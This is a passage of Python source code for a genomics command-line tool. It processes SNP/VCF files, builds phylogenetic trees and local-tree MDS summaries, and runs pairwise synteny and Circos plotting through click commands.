            subprocess.call("""(cat new_header.txt;
cat %s | grep -v ^#;) \
> %s"""%(sort_vcf_in.replace('.vcf','.new_head.vcf'),vcf_out),shell=True)# sort_vcf_in.replace('.vcf','.new_head_final.vcf')
            self.snp_file = vcf_out
        else:
            print('File must be in vcf format before proceeding.')
    def merge_vcf(self, vcf_out, excluded_species, reference_species, *list_vcf_obj):
        """Merge several SNP objects' vcfs with bcftools, keeping only sites
        present in all of them, then drop excluded_species plus the duplicated
        reference sample columns. Returns a new SNP over vcf_out."""
        #list_vcfs = list_vcfs.split(',')
        list_vcfs = [vcf_obj.snp_file for vcf_obj in list_vcf_obj]
        # bcftools --force-samples renames duplicate samples to '2:name', '3:name', ...;
        # exclude those reference copies along with the user-supplied species.
        excluded_species = ','.join(excluded_species.split(',')+['%d:%s'%(i+2,reference_species) for i in range(len(list_vcfs) - 1)])
        list_vcfs2 = []
        for vcf in list_vcfs:
            # Keep only records shared with every other vcf, then bgzip + index for merging.
            subprocess.call("(cat %s | grep ^# ; bedtools intersect -a %s -b %s ;) > %s"%(vcf,vcf,' '.join([v for v in list_vcfs if v != vcf]),vcf.replace('.vcf','.intersect.vcf')),shell=True)
            vcf = vcf.replace('.vcf','.intersect.vcf')
            subprocess.call('bcftools view %s -O z -o %s'%(vcf, vcf+'.gz'),shell=True)
            subprocess.call('bcftools index %s.gz'%vcf,shell=True)
            list_vcfs2.append(vcf)
        subprocess.call('bcftools merge %s -O v --force-samples -o %s.gz'%(' '.join([vcf+'.gz' for vcf in list_vcfs2]), vcf_out),shell=True)
        subprocess.call('bcftools view %s -O v -s ^%s -o %s'%(vcf_out+'.gz',excluded_species,vcf_out), shell=True)
        return SNP(vcf_out)
    def vcf2tab(self,tab_out):
        """Export CHROM/POS/REF plus per-sample translated genotypes to a tab file."""
        subprocess.call("bcftools query -Hf '%%CHROM\\t%%POS\\t%%REF[\\t%%TGT]\\n' -o %s %s"%(tab_out,self.snp_file),shell=True)
        self.tab = tab_out
    def tab2fasta(self, fasta_out, sample = 0, tab_in = '', df = ''):
        """Write one concatenated-genotype fasta record per sample column.

        sample -- if non-zero, randomly subsample that many rows first.
        tab_in -- optional tab file overriding self.tab.
        df -- optional preloaded DataFrame (skips reading self.tab).
        Returns a fasta_aln over fasta_out.
        """
        if tab_in:
            self.tab = tab_in
        if not list(df):
            sample = sample
            df = pd.read_table(self.tab,header=0)
            if sample:
                df = df.sample(n=sample)
        with open(fasta_out,'w') as f:
            for col in list(df)[3:]:
                # Column headers look like '[i]species:GT'; recover the species name.
                species = col[col.find(']')+1:col.rfind(':')]
                f.write('>%s\n%s\n'%(species,''.join((df[col].as_matrix())).replace('.','-').replace('*','-')))
        return fasta_aln(fasta_out)
    def intersect_vcf(self, bed_regions, vcf_out):
        """Restrict the vcf to records overlapping bed_regions; returns a new SNP."""
        subprocess.call('bedtools intersect -wa -a %s -b %s > %s'%(self.snp_file, bed_regions, vcf_out),shell=True)
        return SNP(vcf_out)
    def visualize_distribution(self, work_dir):
        """Save one SNP-position histogram per chromosome into work_dir."""
        import seaborn as sns, matplotlib.pyplot as plt
        work_dir += '/'
        df = pd.read_table(self.snp_file,header=next(i for i,line in enumerate(open(self.snp_file,'r')) if line.startswith('#CHROM')))
        for chrom in df['#CHROM'].unique():
            dff = df[df['#CHROM'] == chrom]
            plt.figure()
            sns.distplot(dff['POS'].as_matrix())
            plt.title(chrom + ' SNP distribution')
            plt.savefig(work_dir+chrom+'_snp_distribution.png',dpi=300)
    def erase_indels(self, vcf_out):
        """Drop indel records with vcftools; returns a new SNP over the recoded vcf."""
        subprocess.call("vcftools --vcf %s --remove-indels --recode --recode-INFO-all --out %s"%(self.snp_file,vcf_out),shell=True)
        return SNP(vcf_out)
    def run_local_trees(self,snps_interval, phylogeny, work_dir):
        """Launch the local_trees.nf nextflow pipeline over this vcf, building
        one tree per window of snps_interval SNPs with the chosen tool."""
        vcf_file = os.path.abspath(self.snp_file)
        tab_file = vcf_file.replace('.vcf','.tab')
        work_dir = os.path.abspath(work_dir)+'/'
        # OPENBLAS_NUM_THREADS=1 keeps numpy from oversubscribing cores inside nextflow tasks.
        subprocess.call("export OPENBLAS_NUM_THREADS=1 && nextflow run local_trees.nf --vcf_file %s --tab_file %s --snps_interval %d --phylogeny %s --work_dir %s"%(vcf_file,tab_file,snps_interval,phylogeny,work_dir),shell=True)
    def tab2chunks(self, tab_in, snp_intervals, write_file):
        """Split the tab file into consecutive windows of snp_intervals SNPs,
        write each single-chromosome window as a fasta alignment and append
        'interval<TAB>fasta_path' lines to write_file."""
        tab_df = pd.read_table(tab_in,header=0)
        tab_df['[2]POS'] = tab_df['[2]POS'].as_matrix().astype(np.int)
        tab_df = tab_df.sort_values(['# [1]CHROM','[2]POS'])
        subprocess.call('rm %s'%write_file,shell=True)
        for index, df in tab_df.groupby(np.arange(len(tab_df))//snp_intervals):
            chroms = set(df['# [1]CHROM'])
            # Windows spanning a chromosome boundary are skipped.
            if len(chroms) == 1:
                interval_data = '_'.join([list(chroms)[0],str(np.min(df['[2]POS'])),str(np.max(df['[2]POS']))]) # fixme maybe try to do in parallel
                self.tab2fasta('./%s.fa'%interval_data,0,'', df = df)
                with open(write_file,'a') as f:
                    f.write('\t'.join([interval_data,os.path.abspath('./%s.fa'%interval_data)])+'\n')
class fasta_aln:
    """A fasta multiple-sequence alignment: SNP-site extraction (snp-sites)
    and phylogenetic tree inference (iqtree / phyml / fasttree)."""
    def __init__(self, fasta):
        # fasta -- path to the alignment fasta file
        self.fasta = fasta
    def to_snp(self, vcf_out ,fasta_out ,monomorphic):
        """Extract SNP sites to vcf_out and fasta_out with snp-sites, adding -b
        (keep monomorphic sites) when monomorphic is truthy. Returns the new
        SNP and fasta_aln objects."""
        subprocess.call('snp-sites -v%s -o %s %s'%('b' if int(monomorphic) else '',vcf_out,self.fasta),shell=True)
        subprocess.call('snp-sites -m%s -o %s %s'%('b' if int(monomorphic) else '',fasta_out,self.fasta),shell=True)
        return SNP(vcf_out), fasta_aln(fasta_out)
    def generate_tree(self, phylogeny, tree_out = './out.treefile', model='MF',bootstrap=1, n_threads = 'AUTO'):
        """Infer a tree from the alignment and copy the result to tree_out.

        phylogeny -- 'iqtree', 'phyml' or 'fasttree'; anything else prints an
            error and returns None.
        model / n_threads -- forwarded to iqtree only.
        bootstrap -- iqtree -b replicates (only when > 1); phyml -b value.
        Returns a TreeObj over tree_out on success, else None.
        """
        return_tree = 1
        if phylogeny == 'iqtree':
            # Locate the iqtree binary bundled with the active conda env's ete3.
            iqtree_line = next(path for path in sys.path if 'conda/' in path and '/lib/' in path).split('/lib/')[0]+'/bin/ete3_apps/bin/iqtree'
            # A stale checkpoint would make iqtree resume instead of rerunning.
            subprocess.call('rm %s.ckp.gz'%self.fasta,shell=True)
            subprocess.call(iqtree_line + ' -s %s -m %s -nt %s %s'%(self.fasta,model,n_threads,'-b %d'%int(bootstrap) if int(bootstrap) > 1 else ''), shell=True) #GTR
            shutil.copy(self.fasta+'.treefile',tree_out)
        elif phylogeny == 'phyml':
            phylip_in = self.fasta
            if not phylip_in.endswith('.phylip'):#phylip_in.endswith('.fasta') or phylip_in.endswith('.fa'): #FIXME can add biopython conversion
                #subprocess.call(['perl', fasta2phylip, phylip_in, phylip_in.replace('fasta','phylip').replace('fa','phylip')])
                phylip_in = self.fasta.replace('fasta','phylip').replace('fa','phylip')
                AlignIO.convert(self.fasta,'fasta',phylip_in,'phylip-relaxed')
            phymlLine = next(path for path in sys.path if 'conda/' in path and '/lib/' in path).split('/lib/')[0]+'/bin/ete3_apps/bin/phyml'
            # bugfix: bootstrap defaults to the int 1; subprocess argv items must be strings.
            subprocess.call([phymlLine, '-i', phylip_in, '-s', 'BEST', '-q', '-b', str(bootstrap), '-m', 'GTR'])
            if tree_out:
                shutil.copy(phylip_in+'_phyml_tree.txt',tree_out)
        elif phylogeny == 'fasttree':
            fasttreeLine = next(path for path in sys.path if 'conda/' in path and '/lib/' in path).split('/lib/')[0]+'/bin/ete3_apps/bin/FastTree'
            subprocess.call(fasttreeLine + ' -gtr -nt < ' + self.fasta + ' > ' + tree_out, shell=True)
        else:
            print('Please select different phylogenetic analysis tool [iqtree|phyml|fasttree].')
            return_tree = 0
        if return_tree:
            return TreeObj(tree_out)
class TreeObj:
    """A newick tree file: rerooting, distance-matrix export, image rendering,
    and aggregation of many local trees into an MDS 'local PCA' summary."""
    def __init__(self, treefile):
        # treefile -- path to a newick tree; for local_trees2final_output it is
        # instead a tab separated table of interval<TAB>newick lines.
        self.treefile = treefile
    def reroot(self, root_species, tree_out):
        """Reroot on root_species with ete3 and write the tree to tree_out."""
        t = PhyloTree(open(self.treefile,'r').read())
        t.set_outgroup(root_species)
        t.write(tree_out)
        self.treefile = tree_out
    def tree2matrix(self, distance_matrix = 'distance_matrix.csv'):
        """Export pairwise tree distances between all named clades to CSV and
        return the DataFrame (rows/columns sorted by name)."""
        tree = Phylo.read(self.treefile,'newick')
        allclades = list(tree.find_clades(order='level'))
        species_names = [clade.name for clade in allclades if clade.name]
        df = pd.DataFrame(np.nan, index=species_names, columns=species_names)
        # NOTE(review): combinations(..., r=2) never yields i == j, so the
        # diagonal stays NaN rather than 0 — confirm whether that is intended.
        # set_value is a legacy pandas (<1.0) API.
        for i,j in combinations(species_names,r=2):
            if i == j:
                df.set_value(i,j,0)
            if i != j:
                distance = tree.distance(i,j)
                df.set_value(i,j,distance)
                df.set_value(j,i,distance)
        df_keys = sorted(list(df))
        df = df.reindex(index=df_keys,columns=df_keys)
        df.to_csv(distance_matrix)
        return df
    def output_tree_image(self, fasta_obj, output_image):
        """Render the tree to output_image with ete3; when fasta_obj is a fasta
        alignment, display it alongside the leaves (sequences upper-cased)."""
        if fasta_obj.fasta.endswith('.fasta') or fasta_obj.fasta.endswith('.fa'):
            # Upper-case sequence lines only; fasta headers pass through untouched.
            subprocess.call("awk '{ if ($0 !~ />/) {print toupper($0)} else {print $0} }' %s > aln.fasta"%fasta_obj.fasta,shell=True)
            t = PhyloTree(self.treefile,alignment='aln.fasta',alg_format='fasta')
        else:
            t = Tree(self.treefile)
        ts = TreeStyle()
        ns = NodeStyle()
        ns['size']=0
        ts.show_leaf_name = True
        ts.show_branch_length = False
        ts.show_branch_support = True
        for n in t.traverse():
            n.set_style(ns)
        t.render(output_image,tree_style = ts, dpi=300)
    def write_trees_intervals(self, interval, out_file):
        # Emit a single "interval<TAB>newick" line for later aggregation.
        with open(self.treefile,'r') as f1, open(out_file,'w') as f2:
            f2.write('\t'.join([interval,f1.read().strip('\n')]))
    def local_trees2final_output(self,work_dir):
        """Aggregate a table of interval<TAB>newick local trees (self.treefile)
        into a weighted Robinson-Foulds dissimilarity matrix, a 3-D MDS
        embedding and an interactive plotly scatter, all under work_dir."""
        from collections import defaultdict
        import seaborn as sns, matplotlib.pyplot as plt
        from sklearn.manifold import MDS
        import plotly.graph_objs as go
        import plotly.offline as py
        import dendropy
        from dendropy.calculate import treecompare # ete3 calculates this distance as well
        RFDistance = 1  # hard-coded switch; the norm-based else branch below is effectively dead
        work_dir += '/'
        cluster_data = defaultdict(list)
        tns = dendropy.TaxonNamespace()
        # One shared taxon namespace so bipartitions are comparable across trees.
        for interval_data, tree in pd.read_table(self.treefile,header=None,dtype=str).as_matrix().tolist():
            cluster_data[interval_data] = dendropy.Tree.get(data=tree,schema='newick',taxon_namespace=tns)
            cluster_data[interval_data].encode_bipartitions()
        cluster_keys = sorted(cluster_data.keys())
        df = pd.DataFrame(np.nan, index=cluster_keys, columns=cluster_keys)
        # NOTE(review): list + zip concatenation is Python-2 only (zip is lazy in py3);
        # the zip(keys, keys) part supplies the zero diagonal.
        for i,j in list(combinations(cluster_keys,r=2)) + zip(cluster_keys,cluster_keys):
            if i == j:
                df.set_value(i,j,0)
            if i != j:
                if RFDistance:
                    dissimilarity = treecompare.weighted_robinson_foulds_distance(cluster_data[i], cluster_data[j])
                else:
                    # NOTE(review): subtracting dendropy Trees is undefined — dead while RFDistance == 1.
                    dissimilarity = np.linalg.norm(cluster_data[i]-cluster_data[j],None)
                df.set_value(i,j,dissimilarity)
                df.set_value(j,i,dissimilarity)
        # Reorder windows by chromosome then numeric start position
        # (keys look like chrom_start_end).
        keys_df = pd.DataFrame(np.array([key.rsplit('_',2) for key in cluster_keys]))
        keys_df[1] = keys_df[1].as_matrix().astype(np.int)
        keys_df = keys_df.sort_values([0,1])
        keys_df[1] = keys_df[1].as_matrix().astype(str)
        new_keys = np.array(['_'.join(x) for x in keys_df.as_matrix()])
        # FIXME sort by chromosome and position, integer... find a way, maybe feed to new dataframe and sort that way, break labels by _ and sort by [0,1] and not [2]
        df = df.reindex(index=new_keys,columns=new_keys)
        df.to_csv(work_dir+'dissimilarity_matrix_local_pca.csv')
        if 0:  # heatmap rendering disabled
            plt.figure()
            sns.heatmap(df)
            plt.savefig(work_dir+'dissimilarity_matrix_local_pca.png',dpi=300)
        local_pca_dissimilarity = df.as_matrix()
        local_pca_dissimilarity = np.nan_to_num(local_pca_dissimilarity)
        # Embed the precomputed dissimilarities into 3-D for plotting.
        mds = MDS(n_components=3,dissimilarity='precomputed')
        transformed_data = mds.fit_transform(local_pca_dissimilarity)
        np.save(work_dir+'local_pca_MDS_transform.npy',transformed_data)
        pickle.dump(list(df.index.values),open(work_dir+'local_pca_window_names.p','wb'))
        plots = []
        plots.append(go.Scatter3d(x=transformed_data[:,0],y=transformed_data[:,1],z=transformed_data[:,2],text=list(df.index.values), mode='markers',marker=dict(color='blue', size=5),name='Regions'))
        py.plot(go.Figure(data=plots),filename=work_dir+'Local_Topology_Differences.html',auto_open=False)
###################
#### CNS CLASS #### # fixme interface circos plots with CNS analysis, plot density of elements
#######################
#### RUN CLI GROUP ####
# Shared click settings: accept -h as well as --help, widen the help column.
CONTEXT_SETTINGS = dict(help_option_names=['-h','--help'], max_content_width=90)
@click.group(context_settings= CONTEXT_SETTINGS)
@click.version_option(version='0.2')
def joshuatree():
    # Root click group; subcommands register below via @joshuatree.command().
    pass
##################
#### COMMANDS ####
#####################
#### RUN SYNTENY ####
@joshuatree.command() #fixme can use a combo of unout and anchor files, or generate new anchor files after reach end of synteny file list, but there should be more
@click.option('-q', '--query_prot_id', default = 'all', show_default=True, help='Three number or letter proteome identifier of strain being compared against. If all selected, then synteny graph will be created by running pairwise comparisons between all species.')
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-s', '--synteny_path', default = './synteny_path/', show_default=True, help='Path containing synteny files, .unout or .anchors files. *.unout must conform to following pattern: [PAC4GC/PAC2_0].[q_protID]-[PAC4GC/PAC2_0].[s_protID]_5.unout; *.anchors must conform to: [q_protID].[s_protID].[*].anchors. Not neccessary to add files to this path, synteny will be generated if no specification.', type=click.Path(exists=False))
@click.option('-gff', '--gff_path', default = './gff_path/', show_default=True, help='Gff path containing all of the gff/gff3 files. Gff naming must conform to: xxx.[protID].[gff/gff3].', type=click.Path(exists=False))
@click.option('-bed', '--bed_path', default = './bed_path/', show_default=True, help='Bed path containing all of the bed files.', type=click.Path(exists=False))
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-fo', '--fasta_out_dir', default = './fasta_output/', show_default=True, help='Path containing all syntenic aligned regions, organized into fasta files for multiple sequence alignment via Cactus.', type=click.Path(exists=False))
@click.option('-bp', '--bps_threshold', default= 100000, show_default=True, help='Maximum distance from which to merge nearby syntenic regions of a particular genome.')
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-c', '--circos', is_flag=True, help='If selected, visualize each pairwise alignment using Circos.')
@click.option('-ci', '--circos_inputs', default = './circos_inputs/', show_default=True, help='Path containing all of circos inputs and configuration files.', type=click.Path(exists=False))
@click.option('-co', '--circos_outputs', default = './circos_outputs/', show_default=True, help='Path containing all of circos output images.', type=click.Path(exists=False))
def run_synteny_pipeline(query_prot_id,fasta_path,synteny_path,gff_path, bed_path, gene_info, fasta_out_dir, bps_threshold, loci_threshold, circos, circos_inputs, circos_outputs):
    """Stitch together many pairwise syntenic blocks into multiple species syntenic blocks and output as fasta files for a multiple sequence alignment. If synteny files are not supplied, conduct pairwise synteny between all included strains."""
    query_protID = query_prot_id
    # protID is parsed from file names: fastas as xxx_[protID]_xxx.fa, gffs as xxx.[protID].gff.
    fasta_files = {fasta.split('_')[-2] : fasta for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')}
    gff_files = {gff.split('.')[-2] : gff for gff in glob.glob(gff_path+'/*.gff')+glob.glob(gff_path+'/*.gff3') }
    # Only strains that have BOTH a fasta and a gff participate.
    intersect_keys = set(fasta_files.keys()) & set(gff_files.keys())
    fasta_files = {protID:fasta for protID,fasta in fasta_files.items() if protID in intersect_keys}
    gff_files = {protID:gff for protID,gff in gff_files.items() if protID in intersect_keys}
    genomes = {}
    pairwise_syntenies = []
    for protID in intersect_keys:
        genomes[protID] = Genome(fasta_files[protID],bed_path+'/'+protID+'.bed',protID,gff_files[protID],gene_info)
        if circos:
            genomes[protID].export_karyotype(circos_inputs+'/'+protID+'.karyotype.txt')
    # Reuse any precomputed synteny files (.unout or .lifted.anchors) already present.
    synteny_files = glob.glob(synteny_path+'/*.unout')+glob.glob(synteny_path+'/*.lifted.anchors')
    synteny_protIDs, synteny_protIDs2 = [], []
    remaining_protIDs, remaining_synteny = [], []
    if synteny_files:
        for synteny_file in synteny_files:
            if synteny_file.endswith('.unout'):
                # protIDs are the 3 characters following the PAC2_0/PAC4GC tokens in the name.
                coords = reduce(lambda x,y: x+y, sorted([[m.start(0),m.end(0)] for m in re.finditer('PAC2_0|PAC4GC',synteny_file)]))[1::2]
                q_protID, s_prot_ID = map(lambda x: synteny_file[x+1:x+4],coords)
            else:
                # .anchors naming: [q_protID].[s_protID].[*].anchors
                q_protID, s_prot_ID = tuple(synteny_file[synteny_file.rfind('/')+1:].split('.')[:2])
            if q_protID == query_protID or query_protID == 'all': # fixme for now... in future, implement -global option so all sequences can be included
                synteny_protIDs.append((q_protID, s_prot_ID))
                synteny_protIDs2.extend([(q_protID, s_prot_ID),(s_prot_ID, q_protID)])
                pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],synteny_file,loci_threshold=loci_threshold)
                pairwise_synteny.generate_synteny_structure(synteny_path)
                pairwise_syntenies.append(pairwise_synteny)
        # Work out which comparisons still need to be computed from scratch.
        if len(pairwise_syntenies) < len(intersect_keys)-1 and query_protID != 'all':
            synteny_protIDs = set(np.array(synteny_protIDs)[:,1]).union({query_protID})
            remaining_protIDs = set(intersect_keys) - synteny_protIDs
        elif query_protID == 'all':
            remaining_synteny = set(list(combinations(intersect_keys,r=2))) - set(synteny_protIDs)
        else:
            remaining_protIDs = set()
    else:
        if query_protID == 'all':
            remaining_synteny = list(combinations(intersect_keys,r=2))
        else:
            remaining_protIDs = set(intersect_keys) - {query_protID}
    if list(remaining_protIDs) or remaining_synteny:
        # Extract CDS for every genome involved, in parallel.
        def generate_CDS(protID):
            print(protID)
            genomes[protID].extract_CDS()
            return protID
        p = mp.ProcessingPool()
        r = p.amap(generate_CDS,list(set(reduce(lambda x,y: list(x)+list(y),remaining_synteny))) if query_protID == 'all' else remaining_protIDs.union({query_protID}))
        r.wait()
        protIDs = r.get()
        #for protID in remaining_protIDs.union({query_protID}):
        #    genomes[protID].extract_CDS()
        # Compute the missing pairwise syntenies, also in parallel.
        def p_synteny(protIDs):
            q_protID, s_prot_ID = protIDs
            pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
            pairwise_synteny.generate_synteny_structure(synteny_path)
            return pairwise_synteny
        r = p.amap(p_synteny,remaining_synteny if query_protID == 'all' else [(query_protID,s_prot_ID) for s_prot_ID in remaining_protIDs])#,callback=mycallback) # _async
        r.wait()
        pairwise_syntenies.extend(r.get())
        p.close()
        """
        for s_prot_ID in remaining_protIDs:
            pairwise_synteny = PairwiseSynteny(genomes[query_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
            pairwise_synteny.generate_synteny_structure(synteny_path)
            pairwise_syntenies.append(pairwise_synteny)"""
    if circos:
        # One circos link file + image per pairwise comparison.
        for pairwise_synteny in pairwise_syntenies:
            pairwise_synteny.synteny_structure_2_link(circos_inputs+'/%s.%s.link.txt'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID))
            circos_obj = Circos(pairwise_synteny)
            circos_obj.generate_config(ticks = circos_inputs+'/txticks.conf', ideogram = circos_inputs+'/txideogram.conf', links_and_rules = circos_inputs+'/linksAndrules.conf', config=circos_inputs+'/circos.conf')
            circos_obj.run_circos(circos_outputs+'/')
    # Merge all pairwise blocks into multi-species blocks and dump fastas for cactus.
    super_synteny = SuperSynteny(pairwise_syntenies, bps_threshold, genomes[query_protID])
    super_synteny.generate_global_synteny_graph(fasta_out_dir)
@joshuatree.command()
@click.option('-f1', '--fasta_1', default = '1.fasta', show_default=True, help='Fasta file 1.', type=click.Path(exists=False))
@click.option('-f2', '--fasta_2', default = '2.fasta', show_default=True, help='Fasta file 2.', type=click.Path(exists=False))
@click.option('-g1', '--gff_1', default = '1.gff', show_default=True, help='GFF file 1.', type=click.Path(exists=False))
@click.option('-g2', '--gff_2', default = '2.gff', show_default=True, help='GFF file 2.', type=click.Path(exists=False))
@click.option('-link', '--link_file', default = '', show_default=True, help='Link file, either lifted anchors or unout.', type=click.Path(exists=False))
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-w', '--work_dir', default = './', show_default=True, help='Working Directory.')
def extract_syntenic_blocks(fasta_1, fasta_2, gff_1, gff_2, link_file, gene_info, loci_threshold, work_dir):
    """Run pairwise circos in local directory."""
    # NOTE(review): despite the docstring this exports the pairwise syntenic
    # blocks to a bed file; no circos image is produced here — confirm wording.
    work_dir += '/'
    # protID is the second-to-last dot field of the gff name (xxx.[protID].gff).
    genome1 = Genome(fasta_file=fasta_1, bed_file=work_dir+gff_1.split('.')[-2]+'.bed', protID=gff_1.split('.')[-2], gff_file=gff_1, gene_info=gene_info)
    genome2 = Genome(fasta_file=fasta_2, bed_file=work_dir+gff_2.split('.')[-2]+'.bed', protID=gff_2.split('.')[-2], gff_file=gff_2, gene_info=gene_info)
    if not link_file:
        # No precomputed synteny supplied: extract CDS so it can be computed from scratch.
        genome1.extract_CDS()
        genome2.extract_CDS()
    pairwise_synteny = PairwiseSynteny(genome1,genome2,link_file,loci_threshold=loci_threshold)
    pairwise_synteny.generate_synteny_structure('./')
    pairwise_synteny.synteny_structure_2_bed(work_dir+'/%s.%s.synteny.bed'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID))
####################
#### RUN CIRCOS ####
@joshuatree.command()
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-gff', '--gff_path', default = './gff_path/', show_default=True, help='Gff path containing all of the gff/gff3 files. Gff naming must conform to: xxx.[protID].[gff/gff3].', type=click.Path(exists=False))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-n', '--n_chromosomes', default= 25, show_default=True, help='Number of chromosomes in synteny.')
@click.option('-w', '--work_dir', default = './', show_default=True, help='Working Directory.')
@click.option('-v', '--variable_thickness', is_flag=True, help="Variable thickness for the links.")
@click.option('-t', '--thickness_factor', default=1000, show_default=True, help="If variable, thickness of link is length of link divided by factor.")
@click.option('-b', '--bundle_links', is_flag=True, help="Bundle closely spaced links.")
@click.option('-g', '--link_gap', default=10000, show_default=True, help="Gap between closely spaced links.")
def pairwise_circos_links(fasta_path,gff_path,loci_threshold,n_chromosomes,work_dir,variable_thickness,thickness_factor,bundle_links,link_gap):
    # Driver: for every pair of strains that have both a fasta and a gff,
    # shell out to `python JoshuaTree2.py pairwise_circos` with matching options.
    fasta_files = {fasta.split('_')[-2] : fasta for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')}
    gff_files = {gff.split('.')[-2] : gff for gff in glob.glob(gff_path+'/*.gff')+glob.glob(gff_path+'/*.gff3') }
    intersect_keys = set(fasta_files.keys()) & set(gff_files.keys())
    fasta_files = {protID:fasta for protID,fasta in fasta_files.items() if protID in intersect_keys}
    gff_files = {protID:gff for protID,gff in gff_files.items() if protID in intersect_keys}
    for p1,p2 in list(combinations(intersect_keys,r=2)):
        # Map this command's values onto pairwise_circos's short option names.
        opts={'-f1':fasta_files[p1],'-f2':fasta_files[p2],'-g1':gff_files[p1],'-g2':gff_files[p2],'-l':loci_threshold,'-n':n_chromosomes,'-w':work_dir,'-t':thickness_factor,'-g':link_gap}
        if bundle_links:
            opts['-b']=''
        if variable_thickness:
            opts['-v']=''
        # NOTE(review): '-o' (no_output_circos) is always passed to the child command — confirm intended.
        command='python JoshuaTree2.py pairwise_circos -o {0}'.format(' '.join('{0} {1}'.format(k,v) for k,v in opts.items()))
        subprocess.call(command,shell=True)
@joshuatree.command()
@click.option('-f1', '--fasta_1', default = '1.fasta', show_default=True, help='Fasta file 1.', type=click.Path(exists=False))
@click.option('-f2', '--fasta_2', default = '2.fasta', show_default=True, help='Fasta file 2.', type=click.Path(exists=False))
@click.option('-g1', '--gff_1', default = '1.gff', show_default=True, help='GFF file 1.', type=click.Path(exists=False))
@click.option('-g2', '--gff_2', default = '2.gff', show_default=True, help='GFF file 2.', type=click.Path(exists=False))
@click.option('-link', '--link_file', default = '', show_default=True, help='Link file, either lifted anchors or unout.', type=click.Path(exists=False))
@click.option('-chr1', '--chrom_file1', default = '', show_default=True, help='File listing chromosomes in new order for species 1, can change names of all chromosomes via space delimiting in each line: old_chr_name new_chr_name.', type=click.Path(exists=False))
@click.option('-chr2', '--chrom_file2', default = '', show_default=True, help='File listing chromosomes in new order for species 2, can change names of all chromosomes via space delimiting in each line: old_chr_name new_chr_name.', type=click.Path(exists=False))
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-n', '--n_chromosomes', default= 25, show_default=True, help='Number of chromosomes in synteny.')
@click.option('-w', '--work_dir', default = './', show_default=True, help='Working Directory.')
@click.option('-v', '--variable_thickness', is_flag=True, help="Variable thickness for the links.")
@click.option('-t', '--thickness_factor', default=1000, show_default=True, help="If variable, thickness of link is length of link divided by factor.")
@click.option('-b', '--bundle_links', is_flag=True, help="Bundle closely spaced links.")
@click.option('-g', '--link_gap', default=10000, show_default=True, help="Gap between closely spaced links.")
@click.option('-s', '--switch_lines', is_flag=True, help="Switch reference and query lines for circos production.")
@click.option('-o', '--no_output_circos', is_flag=True, help="No output circos.")
def pairwise_circos(fasta_1, fasta_2, gff_1, gff_2, link_file, chrom_file1, chrom_file2, gene_info, loci_threshold, n_chromosomes, work_dir, variable_thickness, thickness_factor, bundle_links, link_gap, switch_lines, no_output_circos):
	"""Run pairwise circos in local directory.

	Builds Genome objects for both species, derives (or loads) their pairwise
	synteny, writes circos link/karyotype inputs into work_dir and, unless
	suppressed, renders the circos plot there."""
	# Guarantee a trailing slash so every path concatenation below lands in work_dir.
	work_dir += '/'
	# protID is taken from the gff basename (second-to-last dot-separated field).
	genome1 = Genome(fasta_file=fasta_1, bed_file=work_dir+gff_1.split('.')[-2]+'.bed', protID=gff_1.split('.')[-2], gff_file=gff_1, gene_info=gene_info)
	genome1.export_karyotype(work_dir+fasta_1[:fasta_1.rfind('.')]+'.karyotype.txt',n_chromosomes, chrom_file=chrom_file1)
	genome2 = Genome(fasta_file=fasta_2, bed_file=work_dir+gff_2.split('.')[-2]+'.bed', protID=gff_2.split('.')[-2], gff_file=gff_2, gene_info=gene_info)
	genome2.export_karyotype(work_dir+fasta_2[:fasta_2.rfind('.')]+'.karyotype.txt',n_chromosomes, chrom_file=chrom_file2)
	# Without a precomputed link file, synteny must be inferred from the CDS sets.
	if not link_file:
		genome1.extract_CDS()
		genome2.extract_CDS()
	pairwise_synteny = PairwiseSynteny(genome1,genome2,link_file,loci_threshold=loci_threshold)
	pairwise_synteny.generate_synteny_structure('./')
	pairwise_synteny.synteny_structure_2_link(work_dir+'/%s.%s.link.txt'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID), bundle_links = bundle_links, link_gap = link_gap)
	if not no_output_circos:
		circos_obj = Circos(pairwise_synteny)
		# FIX: was work_dir+'./txticks.conf' (produced 'dir/./txticks.conf');
		# now consistent with the other three config paths.
		circos_obj.generate_config(ticks = work_dir+'/txticks.conf', ideogram = work_dir+'/txideogram.conf', links_and_rules = work_dir+'/linksAndrules.conf', config=work_dir+'/circos.conf', variable_thickness=variable_thickness, thickness_factor=thickness_factor, switch_lines=switch_lines)
		circos_obj.run_circos(work_dir)
@joshuatree.command()
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
